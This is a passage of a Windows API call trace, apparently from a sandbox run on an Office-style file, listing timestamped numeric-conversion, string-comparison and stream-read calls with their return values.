[0059.142] atoi (_Str="0") returned 0 [0059.142] atoi (_Str="1639") returned 1639 [0059.142] atoi (_Str="1656") returned 1656 [0059.142] atoi (_Str="1334") returned 1334 [0059.142] atoi (_Str="195") returned 195 [0059.143] atoi (_Str="1610") returned 1610 [0059.143] atoi (_Str="5") returned 5 [0059.143] atoi (_Str="187") returned 187 [0059.143] atoi (_Str="180") returned 180 [0059.144] VarR8FromStr (in: strIn="2524.912636678", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.144] VarR4FromR8 (in: dblIn=0x451d5a48, pfltOut=0x40a3b9d3 | out: pfltOut=0x40a3b9d3) returned 0x0 [0059.145] atoi (_Str="825") returned 825 [0059.145] atoi (_Str="847") returned 847 [0059.145] atoi (_Str="187") returned 187 [0059.145] atoi (_Str="180") returned 180 [0059.145] atoi (_Str="6951") returned 6951 [0059.146] atoi (_Str="825") returned 825 [0059.146] atoi (_Str="847") returned 847 [0059.146] atoi (_Str="187") returned 187 [0059.146] atoi (_Str="180") returned 180 [0059.147] atoi (_Str="103") returned 103 [0059.147] atoi (_Str="1639") returned 1639 [0059.149] atoi (_Str="1656") returned 1656 [0059.150] VarI4FromStr (in: strIn="23866", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.150] atoi (_Str="72") returned 72 [0059.150] atoi (_Str="99") returned 99 [0059.150] VarI4FromStr (in: strIn="15477", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.151] VarI4FromStr (in: strIn="15475", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.151] atoi (_Str="119") returned 119 [0059.151] atoi (_Str="845") returned 845 [0059.151] atoi (_Str="875") returned 875 [0059.152] VarR8FromStr (in: strIn="37870.067779542", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.152] VarR4FromR8 (in: dblIn=0x2b400087, pfltOut=0x40e27dc2 | out: pfltOut=0x40e27dc2) returned 0x0 [0059.152] VarR8FromStr (in: strIn="36116.948333964", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.152] VarR4FromR8 (in: dblIn=0x58c07822, pfltOut=0x40e1a29e | out: pfltOut=0x40e1a29e) returned 0x0 [0059.153] atoi (_Str="181") returned 181 [0059.153] atoi (_Str="284") returned 284 [0059.160] VarI4FromStr (in: strIn="15477", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.160] VarI4FromStr (in: strIn="15475", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.161] atoi (_Str="7303") returned 7303 [0059.161] atoi (_Str="181") returned 181 [0059.161] atoi (_Str="284") returned 284 [0059.161] VarI4FromStr (in: strIn="15477", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.162] VarI4FromStr (in: strIn="15475", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.162] VarR8FromStr (in: strIn="2948.5242263179", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.162] VarR4FromR8 (in: dblIn=0x6764562a, pfltOut=0x40a7090c | out: pfltOut=0x40a7090c) returned 0x0 [0059.162] atoi (_Str="845") returned 845 [0059.162] atoi (_Str="875") returned 875 [0059.163] VarR8FromStr (in: strIn="43659.476697455", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.163] VarR4FromR8 (in: dblIn=0x411b056a, pfltOut=0x40e5516f | out: pfltOut=0x40e5516f) returned 0x0 [0059.163] atoi (_Str="423") returned 423 [0059.163] atoi (_Str="371") returned 371 [0059.163] VarI4FromStr (in: strIn="842218828", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.165] VarI4FromStr (in: strIn="842218828", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.165] CRetailMalloc_Realloc () returned 0x7757f48 [0059.165] atoi (_Str="181") returned 181 [0059.166] VarI4FromStr (in: strIn="15477", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.166] VarI4FromStr (in: strIn="15475", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.167] VarI4FromStr (in: strIn="20760", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.167] VarI4FromStr (in: strIn="22044", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.168] VarR8FromStr (in: strIn="10744.33260642", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.168] VarR4FromR8 (in: dblIn=0x92d8e02b, pfltOut=0x40c4fc2a | out: pfltOut=0x40c4fc2a) returned 0x0 [0059.193] VarI4FromStr (in: strIn="20760", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.197] VarI4FromStr (in: strIn="22044", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.199] VarI4FromStr (in: strIn="20760", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.199] VarI4FromStr (in: strIn="22044", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.200] VarR8FromStr (in: strIn="29627.805719981", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.200] VarR4FromR8 (in: dblIn=0x90ea8a08, pfltOut=0x40dceef3 | out: pfltOut=0x40dceef3) returned 0x0 [0059.201] VarR8FromStr (in: strIn="41197.24567741", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.201] VarR4FromR8 (in: dblIn=0xdc96df2a, pfltOut=0x40e41da7 | out: pfltOut=0x40e41da7) returned 0x0 [0059.201] VarR8FromStr (in: strIn="41197.24567741", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.201] VarR4FromR8 (in: dblIn=0xdc96df2a, pfltOut=0x40e41da7 | out: pfltOut=0x40e41da7) returned 0x0 [0059.202] VarI4FromStr (in: strIn="20760", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.202] VarI4FromStr (in: strIn="22044", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.203] VarI4FromStr (in: strIn="22044", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.204] VarR8FromStr (in: strIn="36257.001315456", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.204] VarR4FromR8 (in: dblIn=0xac6b610, pfltOut=0x40e1b420 | out: pfltOut=0x40e1b420) returned 0x0 [0059.205] VarR8FromStr (in: strIn="18102.344981587", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.205] VarR4FromR8 (in: dblIn=0x142da679, pfltOut=0x40d1ad96 | out: pfltOut=0x40d1ad96) returned 0x0 [0059.205] VarR8FromStr (in: strIn="54037.066736352", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.206] VarR4FromR8 (in: dblIn=0x22b44629, pfltOut=0x40ea62a2 | out: pfltOut=0x40ea62a2) returned 0x0 [0059.207] VarI4FromStr (in: strIn="20100", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.208] VarR8FromStr (in: strIn="34629.578441625", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.208] VarR4FromR8 (in: dblIn=0x829802c1, pfltOut=0x40e0e8b2 | out: pfltOut=0x40e0e8b2) returned 0x0 [0059.208] VarR8FromStr (in: strIn="52325.267279073", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.208] VarR4FromR8 (in: dblIn=0x8d8cd7ae, pfltOut=0x40e98ca8 | out: pfltOut=0x40e98ca8) returned 0x0 [0059.209] VarI4FromStr (in: strIn="32032", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.209] VarR8FromStr (in: strIn="52325.267279073", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.209] VarR4FromR8 (in: dblIn=0x8d8cd7ae, pfltOut=0x40e98ca8 | out: pfltOut=0x40e98ca8) returned 0x0 [0059.209] VarR8FromStr (in: strIn="30296.844265916", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.209] VarR4FromR8 (in: dblIn=0x873e896, pfltOut=0x40dd9636 | out: pfltOut=0x40dd9636) returned 0x0 [0059.210] VarI4FromStr (in: strIn="21492", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.210] VarR8FromStr (in: strIn="29984.044617564", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.210] VarR4FromR8 (in: dblIn=0xdb03a08d, pfltOut=0x40dd4802 | out: pfltOut=0x40dd4802) returned 0x0 [0059.210] VarI4FromStr (in: strIn="31949", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.212] VarR8FromStr (in: strIn="23350.404601261", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.212] VarR4FromR8 (in: dblIn=0xe4fcaffb, pfltOut=0x40d6cd99 | out: pfltOut=0x40d6cd99) returned 0x0 [0059.212] VarR8FromStr (in: strIn="52656.324187176", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.212] VarR4FromR8 (in: dblIn=0x5fbdc8d6, pfltOut=0x40e9b60a | out: pfltOut=0x40e9b60a) returned 0x0 [0059.212] VarI4FromStr (in: strIn="21492", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.213] CExposedStream::Read () returned 0x0 [0059.213] CExposedStream::Read () returned 0x0 [0059.213] atoi (_Str="2438") returned 2438 [0059.213] atoi (_Str="2432") returned 2432 [0059.213] atoi (_Str="1033") returned 1033 [0059.213] atoi (_Str="1052") returned 1052 [0059.214] atoi (_Str="101") returned 101 [0059.214] atoi (_Str="89") returned 89 [0059.214] atoi (_Str="2438") returned 2438 [0059.214] atoi (_Str="2432") returned 2432 [0059.215] VarI4FromStr (in: strIn="30240", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.215] atoi (_Str="126") returned 126 [0059.215] atoi (_Str="2438") returned 2438 [0059.216] atoi (_Str="2432") returned 2432 [0059.217] VarI4FromStr (in: strIn="30240", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.217] atoi (_Str="126") returned 126 [0059.218] atoi (_Str="2438") returned 2438 [0059.219] atoi (_Str="2432") returned 2432 [0059.220] VarI4FromStr (in: strIn="632263140", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.220] atoi (_Str="1033") returned 1033 [0059.220] atoi (_Str="1052") returned 1052 [0059.220] VarR8FromStr (in: strIn="22497.581196003", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.220] VarR4FromR8 (in: dblIn=0x3250b85d, pfltOut=0x40d5f865 | out: pfltOut=0x40d5f865) returned 0x0 [0059.221] VarR8FromStr (in: strIn="40077.978057863", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.221] VarR4FromR8 (in: dblIn=0x4c4000e6, pfltOut=0x40e391bf | out: pfltOut=0x40e391bf) returned 0x0 [0059.222] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="qsuOJ", cchCount1=-1, lpString2="UkqurTJ6a", cchCount2=-1) returned 1 [0059.222] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Urjiz0Xq8", cchCount1=-1, lpString2="IrPzb7", cchCount2=-1) returned 3 [0059.222] atoi (_Str="416") returned 416 [0059.222] atoi (_Str="361") returned 361 [0059.222] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Urjiz0Xq8", cchCount1=-1, lpString2="IrPzb7", cchCount2=-1) returned 3 [0059.222] atoi (_Str="1054") returned 1054 [0059.223] atoi (_Str="1070") returned 1070 [0059.223] atoi (_Str="109") returned 109 [0059.223] atoi (_Str="416") returned 416 [0059.223] atoi (_Str="361") returned 361 [0059.224] atoi (_Str="1054") returned 1054 [0059.224] atoi (_Str="1070") returned 1070 [0059.224] atoi (_Str="1290") returned 1290 [0059.224] atoi (_Str="1310") returned 1310 [0059.224] VarI4FromStr (in: strIn="26950", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.225] atoi (_Str="550") returned 550 [0059.225] VarR8FromStr (in: strIn="5891.4627070552", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.225] VarR4FromR8 (in: dblIn=0x73f835b6, pfltOut=0x40b70376 | out: pfltOut=0x40b70376) returned 0x0 [0059.225] VarR8FromStr (in: strIn="5891.4627070552", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.226] VarR4FromR8 (in: dblIn=0x73f835b6, pfltOut=0x40b70376 | out: pfltOut=0x40b70376) returned 0x0 [0059.226] atoi (_Str="416") returned 416 [0059.226] atoi (_Str="361") returned 361 [0059.228] atoi (_Str="1054") returned 1054 [0059.228] atoi (_Str="1070") returned 1070 [0059.228] atoi (_Str="1290") returned 1290 [0059.228] atoi (_Str="1310") returned 1310 [0059.229] atoi (_Str="42") returned 42 [0059.229] atoi (_Str="416") returned 416 [0059.229] atoi (_Str="361") returned 361 [0059.229] atoi (_Str="1054") returned 1054 [0059.230] atoi (_Str="1070") returned 1070 [0059.230] VarI4FromStr (in: strIn="30222", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.230] atoi (_Str="1290") returned 1290 [0059.230] atoi (_Str="1310") returned 1310 [0059.230] atoi (_Str="0") returned 0 [0059.231] VarI4FromStr (in: strIn="26950", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.231] atoi (_Str="550") returned 550 [0059.231] VarI4FromStr (in: strIn="30222", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.231] atoi (_Str="946") returned 946 [0059.232] atoi (_Str="1") returned 1 [0059.234] atoi (_Str="3511") returned 3511 [0059.234] atoi (_Str="3518") returned 3518 [0059.235] atoi (_Str="1564") returned 1564 [0059.235] atoi (_Str="1549") returned 1549 [0059.235] atoi (_Str="3511") returned 3511 [0059.235] atoi (_Str="3518") returned 3518 [0059.235] atoi (_Str="0") returned 0 [0059.236] atoi (_Str="624") returned 624 [0059.236] atoi (_Str="654") returned 654 [0059.236] atoi (_Str="91") returned 91 [0059.236] atoi (_Str="53") returned 53 [0059.236] atoi (_Str="0") returned 0 [0059.237] atoi (_Str="1564") returned 1564 [0059.237] atoi (_Str="1549") returned 1549 [0059.237] atoi (_Str="3511") returned 3511 [0059.237] atoi (_Str="3518") returned 3518 [0059.238] VarR8FromStr (in: strIn="24787.61336189", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.238] VarR4FromR8 (in: dblIn=0x41523a8a, pfltOut=0x40d834e7 | out: pfltOut=0x40d834e7) returned 0x0 [0059.238] atoi (_Str="624") returned 624 [0059.238] atoi (_Str="654") returned 654 [0059.238] atoi (_Str="221") returned 221 [0059.238] atoi (_Str="946") returned 946 [0059.239] atoi (_Str="1") returned 1 [0059.239] atoi (_Str="3511") returned 3511 [0059.239] atoi (_Str="3518") returned 3518 [0059.239] atoi (_Str="0") returned 0 [0059.240] VarR8FromStr (in: strIn="37899.752599606", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.240] VarR4FromR8 (in: dblIn=0x154bc4d8, pfltOut=0x40e28178 | out: pfltOut=0x40e28178) returned 0x0 [0059.240] atoi (_Str="284") returned 284 [0059.240] atoi (_Str="207") returned 207 [0059.241] VarI4FromStr (in: strIn="22740", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.241] atoi (_Str="1516") returned 1516 [0059.241] VarR8FromStr (in: strIn="58799.045747196", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.241] VarR4FromR8 (in: dblIn=0x76c2d2d7, pfltOut=0x40ecb5e1 | out: pfltOut=0x40ecb5e1) returned 0x0 [0059.242] VarI4FromStr (in: strIn="13583", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.245] atoi (_Str="799") returned 799 [0059.246] VarR8FromStr (in: strIn="58799.045747196", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.246] VarR4FromR8 (in: dblIn=0x76c2d2d7, pfltOut=0x40ecb5e1 | out: pfltOut=0x40ecb5e1) returned 0x0 [0059.246] atoi (_Str="284") returned 284 [0059.246] atoi (_Str="207") returned 207 [0059.248] VarI4FromStr (in: strIn="22740", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.249] atoi (_Str="1516") returned 1516 [0059.249] VarR8FromStr (in: strIn="28412.748604887", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.249] VarR4FromR8 (in: dblIn=0xe92478d3, pfltOut=0x40dbbf2f | out: pfltOut=0x40dbbf2f) returned 0x0 [0059.249] VarI4FromStr (in: strIn="13583", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.250] atoi (_Str="799") returned 799 [0059.250] atoi (_Str="673") returned 673 [0059.250] atoi (_Str="635") returned 635 [0059.250] VarI4FromStr (in: strIn="27552", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.251] atoi (_Str="672") returned 672 [0059.251] VarI4FromStr (in: strIn="22740", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.251] atoi (_Str="1516") returned 1516 [0059.252] atoi (_Str="202") returned 202 [0059.252] atoi (_Str="284") returned 284 [0059.252] atoi (_Str="207") returned 207 [0059.253] VarI4FromStr (in: strIn="22740", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.253] atoi (_Str="1516") returned 1516 [0059.253] atoi (_Str="50") returned 50 [0059.253] VarI4FromStr (in: strIn="13583", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.253] atoi (_Str="799") returned 799 [0059.254] VarI4FromStr (in: strIn="1422815720", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.254] atoi (_Str="673") returned 673 [0059.254] atoi (_Str="635") returned 635 [0059.254] VarR8FromStr (in: strIn="747.66630029418", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.254] VarR4FromR8 (in: dblIn=0x953fa68c, pfltOut=0x40875d54 | out: pfltOut=0x40875d54) returned 0x0 [0059.255] atoi (_Str="211") returned 211 [0059.255] atoi (_Str="10") returned 10 [0059.255] VarI4FromStr (in: strIn="14742", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.255] atoi (_Str="1053") returned 1053 [0059.256] VarR8FromStr (in: strIn="62588.649645934", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.256] VarR4FromR8 (in: dblIn=0xc9e64510, pfltOut=0x40ee8f94 | out: pfltOut=0x40ee8f94) returned 0x0 [0059.256] VarI4FromStr (in: strIn="13315", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.257] VarI4FromStr (in: strIn="25547", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.257] atoi (_Str="433") returned 433 [0059.258] VarI4FromStr (in: strIn="14742", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.258] atoi (_Str="1053") returned 1053 [0059.258] VarR8FromStr (in: strIn="48937.647857989", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.259] VarR4FromR8 (in: dblIn=0xbb40ad67, pfltOut=0x40e7e534 | out: pfltOut=0x40e7e534) returned 0x0 [0059.261] atoi (_Str="995") returned 995 [0059.261] atoi (_Str="1014") returned 1014 [0059.261] VarR8FromStr (in: strIn="25271.004833214", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.261] VarR4FromR8 (in: dblIn=0x4f2ff804, pfltOut=0x40d8adc0 | out: pfltOut=0x40d8adc0) returned 0x0 [0059.261] atoi (_Str="112") returned 112 [0059.261] atoi (_Str="166") returned 166 [0059.262] atoi (_Str="211") returned 211 [0059.262] atoi (_Str="10") returned 10 [0059.263] VarI4FromStr (in: strIn="14742", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.263] atoi (_Str="1053") returned 1053 [0059.263] VarI4FromStr (in: strIn="13770", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.264] VarI4FromStr (in: strIn="25547", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.264] atoi (_Str="433") returned 433 [0059.265] VarI4FromStr (in: strIn="14742", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.265] atoi (_Str="1053") returned 1053 [0059.265] VarR8FromStr (in: strIn="17568.14608713", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.266] VarR4FromR8 (in: dblIn=0x597dd56e, pfltOut=0x40d12809 | out: pfltOut=0x40d12809) returned 0x0 [0059.266] atoi (_Str="995") returned 995 [0059.266] atoi (_Str="1014") returned 1014 [0059.266] VarR8FromStr (in: strIn="6377.5297357694", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.266] VarR4FromR8 (in: dblIn=0x9cc36d18, pfltOut=0x40b8e987 | out: pfltOut=0x40b8e987) returned 0x0 [0059.267] atoi (_Str="112") returned 112 [0059.267] atoi (_Str="166") returned 166 [0059.267] VarI4FromStr (in: strIn="25547", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.268] atoi (_Str="433") returned 433 [0059.268] VarI4FromStr (in: strIn="14742", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.268] atoi (_Str="1053") returned 1053 [0059.268] atoi (_Str="0") returned 0 [0059.269] atoi (_Str="138") returned 138 [0059.269] atoi (_Str="7") returned 7 [0059.269] VarI4FromStr (in: strIn="10307", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.269] atoi (_Str="937") returned 937 [0059.269] atoi (_Str="586") returned 586 [0059.269] atoi (_Str="554") returned 554 [0059.271] VarR8FromStr (in: strIn="24944.076219163", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.271] VarR4FromR8 (in: dblIn=0xe0c6571a, pfltOut=0x40d85c04 | out: pfltOut=0x40d85c04) returned 0x0 [0059.272] VarI4FromStr (in: strIn="1908131720", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.272] atoi (_Str="138") returned 138 [0059.272] atoi (_Str="7") returned 7 [0059.272] VarI4FromStr (in: strIn="10307", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.272] atoi (_Str="937") returned 937 [0059.272] VarR8FromStr (in: strIn="29918.829973692", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.273] VarR4FromR8 (in: dblIn=0x1e49f9ec, pfltOut=0x40dd37b5 | out: pfltOut=0x40dd37b5) returned 0x0 [0059.273] atoi (_Str="586") returned 586 [0059.273] atoi (_Str="554") returned 554 [0059.273] VarI4FromStr (in: strIn="19562", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.274] atoi (_Str="0") returned 0 [0059.274] atoi (_Str="138") returned 138 [0059.274] atoi (_Str="7") returned 7 [0059.274] VarI4FromStr (in: strIn="10307", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.274] atoi (_Str="937") returned 937 [0059.274] atoi (_Str="586") returned 586 [0059.274] atoi (_Str="554") returned 554 [0059.275] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="uxCLeY", cchCount1=-1, lpString2="Ug3EXMGo", cchCount2=-1) returned 3 [0059.275] VarR8FromStr (in: strIn="18599.904877237", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.275] VarR4FromR8 (in: dblIn=0xe98236f4, pfltOut=0x40d229f9 | out: pfltOut=0x40d229f9) returned 0x0 [0059.275] atoi (_Str="138") returned 138 [0059.275] atoi (_Str="7") returned 7 [0059.275] VarI4FromStr (in: strIn="10307", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.276] atoi (_Str="937") returned 937 [0059.276] VarI4FromStr (in: strIn="217354212", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.276] atoi (_Str="586") returned 586 [0059.276] atoi (_Str="554") returned 554 [0059.276] atoi (_Str="0") returned 0 [0059.276] atoi (_Str="73") returned 73 [0059.276] atoi (_Str="123") returned 123 [0059.277] atoi (_Str="6150") returned 6150 [0059.277] atoi (_Str="6155") returned 6155 [0059.277] VarR8FromStr (in: strIn="63739.124401225", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.277] VarR4FromR8 (in: dblIn=0xfb18471f, pfltOut=0x40ef1f63 | out: pfltOut=0x40ef1f63) returned 0x0 [0059.277] CRetailMalloc_Realloc () returned 0x88823d8 [0059.279] atoi (_Str="124") returned 124 [0059.279] atoi (_Str="232") returned 232 [0059.280] atoi (_Str="6150") returned 6150 [0059.280] atoi (_Str="6155") returned 6155 [0059.280] atoi (_Str="5691") returned 5691 [0059.280] atoi (_Str="271") returned 271 [0059.280] atoi (_Str="134") returned 134 [0059.280] atoi (_Str="5633") returned 5633 [0059.281] atoi (_Str="131") returned 131 [0059.281] atoi (_Str="134") returned 134 [0059.281] atoi (_Str="73") returned 73 [0059.281] atoi (_Str="123") returned 123 [0059.281] CExposedStream::Read () returned 0x0 [0059.281] CExposedStream::Read () returned 0x0 [0059.282] atoi (_Str="6150") returned 6150 [0059.282] atoi (_Str="6155") returned 6155 [0059.282] VarI4FromStr (in: strIn="22456", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.283] VarI4FromStr (in: strIn="32637", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.283] atoi (_Str="473") returned 473 [0059.283] atoi 